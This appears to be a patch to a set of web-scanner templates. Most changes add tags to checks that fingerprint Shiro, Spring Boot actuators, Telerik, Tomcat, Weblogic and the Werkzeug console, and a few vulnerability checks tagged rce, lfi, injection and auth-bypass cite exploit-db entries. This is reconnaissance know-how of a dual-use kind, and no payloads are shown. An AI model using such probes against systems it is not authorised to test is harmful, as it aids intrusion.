tags: tech,shiro
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}'
|
- '{{BaseURL}}'
|
||||||
headers:
|
headers:
|
||||||
Cookie: rememberMe=123;
|
Cookie: rememberMe=123;
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- rememberMe=deleteMe
|
- 'rememberMe=deleteMe'
|
||||||
part: header
|
part: header
|
|
@ -4,13 +4,17 @@ info:
|
||||||
name: Detect Springboot Actuators
|
name: Detect Springboot Actuators
|
||||||
author: that_juan_,dwisiswant0,wdahlenb
|
author: that_juan_,dwisiswant0,wdahlenb
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,springboot,actuator
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
- "{{BaseURL}}/actuator"
|
- "{{BaseURL}}/actuator"
|
||||||
- "{{BaseURL}}/favicon.ico"
|
- "{{BaseURL}}/favicon.ico"
|
||||||
|
- "{{BaseURL}}/actuator/favicon.ico"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: or
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Detect Microsoft SQL Server Reporting
|
name: Detect Microsoft SQL Server Reporting
|
||||||
author: puzzlepeaches
|
author: puzzlepeaches
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,micrsoft
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,11 +4,13 @@ info:
|
||||||
name: Detect Telerik Web UI fileupload handler
|
name: Detect Telerik Web UI fileupload handler
|
||||||
author: organiccrap
|
author: organiccrap
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,telerik
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
|
- "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: terraform-detect
|
id: terraform-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Terraform Provider
|
name: Detect Terraform Provider
|
||||||
author: geeknik
|
author: geeknik
|
||||||
description: Write Infrastructure as Code - https://www.terraform.io/
|
description: Write Infrastructure as Code - https://www.terraform.io/
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,terraform
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,10 +1,12 @@
|
||||||
id: tomcat-version-detect
|
id: tomcat-version
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Tomcat Version
|
name: Detect Tomcat Version
|
||||||
author: philippedelteil
|
author: philippedelteil
|
||||||
description: If an Tomcat instance is deployed on the target URL, when we send a request for
|
description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.
|
||||||
a non existent resource we receive a Tomcat error page with version.
|
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,tomcat,apache
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -1,8 +1,10 @@
|
||||||
id: tor-socks-proxy
|
id: tor-socks-proxy
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect tor SOCKS proxy
|
name: Detect tor SOCKS proxy
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,tor,proxy
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Detect Weblogic
|
name: Detect Weblogic
|
||||||
author: bing0o
|
author: bing0o
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,weblogic
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Werkzeug debugger console
|
name: Werkzeug debugger console
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,werkzeug
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,6 +8,7 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://www.securifera.com/advisories/sec-2020-0001/
|
- https://www.securifera.com/advisories/sec-2020-0001/
|
||||||
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
|
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
|
||||||
|
tags: rce,listserv,ognl
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://www.freebuf.com/articles/system/125177.html
|
reference: https://www.freebuf.com/articles/system/125177.html
|
||||||
|
tags: injection,cacti
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://www.exploit-db.com/exploits/27888
|
reference: https://www.exploit-db.com/exploits/27888
|
||||||
|
tags: exposure,resin
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://www.exploit-db.com/exploits/49054
|
reference: https://www.exploit-db.com/exploits/49054
|
||||||
|
tags: lfi,pmb
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://www.exploit-db.com/exploits/48877
|
reference: https://www.exploit-db.com/exploits/48877
|
||||||
|
tags: auth-bypass
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://www.exploit-db.com/exploits/48880
|
reference: https://www.exploit-db.com/exploits/48880
|
||||||
|
tags: auth-bypass,zms
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
Loading…
Reference in New Issue